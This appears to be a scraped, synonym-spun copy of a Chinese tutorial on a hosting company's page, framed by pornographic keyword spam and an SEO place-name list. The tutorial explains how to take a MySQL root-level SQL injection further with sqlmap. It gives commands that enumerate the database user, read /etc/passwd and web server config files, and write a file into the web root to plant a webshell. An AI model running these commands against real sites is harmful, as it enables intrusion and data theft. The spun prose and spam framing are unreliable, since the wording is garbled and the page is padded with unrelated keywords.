欧美一区2区三区4区公司二百,国产精品婷婷午夜在线观看,自拍偷拍亚洲精品,国产美女诱惑一区二区

歡迎來到夢飛科技

網絡技術

當前優惠活動:

sqlmap注入mysql和到root權限后怎么樣深入

 碰著一mysql root權限注入點,實驗用sqlmap進一步滲透獲取更高權限,東亞服務器 臺灣服務器,詳細如下:

判定注入點的當前用戶和當前數據庫

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db

 

root權限注入點可以實驗讀取系統文件,好比/etc/passwd,以及apache,nginx的設置文件等,相關設置文件路徑如下:

nginx: usr/local/nginx/conf/nginx.conf

 

常用的apache設置文件路徑有:

/etc/httpd/conf/httpd.conf

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

 

sqlmap讀取文件語法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"

假如magic_quotes_gpc=off就可以實驗舉辦寫入Webshell,sqlmap寫入文件語法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt

將當地的test.txt寫入到站點處事器的html目次下。

夢飛科技 - 全球數據中心基礎服務領先供應商

Copyright © 2003-2019 MFISP.COM. 國外服務器租用 IDC公司 版權所有 ? 粵ICP備11019662號

主站蜘蛛池模板: 苗栗市| 临沧市| 苗栗市| 南汇区| 宜宾市| 余庆县| 万源市| 桃江县| 阳江市| 永新县| 南漳县| 金堂县| 琼结县| 镶黄旗| 金平| 年辖:市辖区| 监利县| 泗洪县| 文化| 金华市| 唐海县| 宜城市| 宜兰县| 洛南县| 和龙市| 古交市| 云南省| 盘锦市| 东台市| 丰台区| 外汇| 礼泉县| 兴和县| 民乐县| 依兰县| 巴林左旗| 攀枝花市| 临漳县| 岳普湖县| 醴陵市| 绥宁县|